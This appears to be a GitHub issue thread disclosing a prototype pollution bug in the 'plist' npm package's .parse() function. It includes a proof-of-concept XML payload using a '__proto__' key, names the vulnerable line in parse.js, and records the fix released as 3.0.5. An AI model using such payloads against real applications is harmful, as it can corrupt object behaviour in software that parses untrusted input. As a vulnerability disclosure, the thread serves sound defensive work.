Prototype Pollution using .parse()

[keerok]

Hi, There's a prototype pollution in .parse() related to the xml that are being parsed in it. In the following example the prototype pollution will affect the length parameter.

var plist = require('plist');

var xml = `
<plist version="1.0">
    <key>metadata</key>
    <dict>
      <key>bundle-identifier</key>
      <string>com.company.app</string>
    </dict>
  </plist>`;

console.log(plist.parse(xml));
/**
 * * * * * * * * * * * * * * * * * * * * * * * * * *
 * * * * END OF THE NORMAL CODE EXAMPLE! * * * * * * 
 * * * * * * * * * * * * * * * * * * * * * * * * * * 
 **/


/**
 * * * * * * * * * * * *
 * PROTOTYPE POLLUTION *
 * * * * * * * * * * * *
 **/
var xmlPollution = `
<plist version="1.0">
  <dict>
    <key>__proto__</key>
    <dict>
      <key>length</key>
      <string>polluted</string>
    </dict>
  </dict>
</plist>`;
console.log(plist.parse(xmlPollution).length); // polluted

• More information about the vulnerability: https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf

[mario-canva]

The Github advisory states this vulnerability has been fixed on 3.0.4 but I can still reproduce in 3.0.4 as well.

The version 3.0.4 has been released back in August 2021 and the vulnerability was reported on January 2022. The 3.0.4 version only inlines an external dependency so does little in terms of security.

The vulnerable code seems to be on the parsePlistXml function

plist.js/lib/parse.js

Line 127 in fa8e184

new_obj[key] = parsePlistXML(node.childNodes[i]);

@TooTallNate will try to submit a PR to fix this vulnerability in the next few days, unless you want to fix yourself.

[mario-canva]

Thanks for merging my PR @mreinstein . Would you please release a new version of plist with this fix? So people can patch against this prototype pollution vulnerability.

[mreinstein]

published as 3.0.5 on npm. Thanks for the PR!